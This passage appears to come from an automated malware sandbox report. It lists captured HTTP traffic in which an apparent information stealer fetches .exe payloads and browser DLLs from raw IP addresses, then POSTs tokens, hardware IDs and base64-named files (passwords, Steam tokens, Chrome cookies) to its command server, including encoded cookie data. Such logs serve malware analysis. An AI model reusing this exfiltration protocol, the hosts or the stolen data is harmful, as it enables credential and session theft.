name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="file"------HCFCFHJDBKJKEBFHJEHI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="message"ybncbhylepme------IDHIIJJJKEGIDGCBAFIJ--
Source: global traffic HTTP traffic detected: GET /prog/66cf818156193_ldjfnsfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66cf75d3791d7_vrewqgq.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJDBAEHIJKJKEBFIEGHHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 2d 2d 0d 0a Data Ascii: ------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------IJJDBAEHIJKJKEBFIEGHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IJJDBAEHIJKJKEBFIEGH--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258-a33c7340-61ca------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------KEHDHIDAEHCFHJJJJECA--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="mode"1------AEGHJKJKKJDHIDHJKJDB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="mode"2------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="mode"21------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHHost: 147.45.68.138Content-Length: 8173Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="file_name"Q29va2ll
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_data"------HJKKFIJKFCAKJJJKJKFI--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_data"------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 147.45.68.138Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="mode"3------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 2d 2d 0d 0a Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"77fc0d0800453cee3325bc12f64e6689------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"d9949d63cb2f6fce6f80667c0c98ea24------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="mode"4------AKEGDAKEHJDHIDHJJDAE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 147.45.68.138Content-Length: 457Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 66 63 30 64 30 38 30 30 34 35 33 63 65 65 33 33 32 35 62 63 31 32 66 36 34 65 36 36 38 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 39 39 34 39 64 36 33 63 62 32 66 36 66 63 65 36 66 38 30 36 36 37 63 30 63 39 38 65 61 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 